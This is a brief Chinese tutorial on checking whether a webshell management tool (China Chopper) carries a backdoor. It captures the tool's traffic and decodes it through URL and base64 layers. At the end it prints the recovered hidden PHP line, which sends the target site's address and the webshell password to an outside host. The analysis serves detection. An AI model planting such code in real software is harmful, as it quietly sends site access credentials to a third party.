查看工具是否存在后门
1、将工具打开(如:菜刀)连接上一个任务;
2、打开进程抓包工具 WSExplorer 或 WSockExpert 设置对菜刀捕获数据;
WSockExpert抓包教程可参考
https://www.cnblogs.com/mfrbuaa/p/4298594.html
3、对url数据进行解包
将上面获取的数据复制到Encode中,如图5所示,选择“URI”类型,单击“Decoder”进行解码;单击“Encoder”按钮对输入框中的内容进行编码。
将解码后的“z0=”后面的数据复制到Encode输入框中,选择base64解码,如图6所示
图6第一次base64解码
base64解码后的数据,在标红的部分还存在base64加密
将上面标红的部分的base64加密代码复制到Encode程序输入框中,选择base64进行Decode,如图7所示,获取其后门地址代码:
图7获取后门地址
if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('http://www.api.com.de /Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'& Pass='.key($_POST));}
其中
http://www.api.com.de/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST)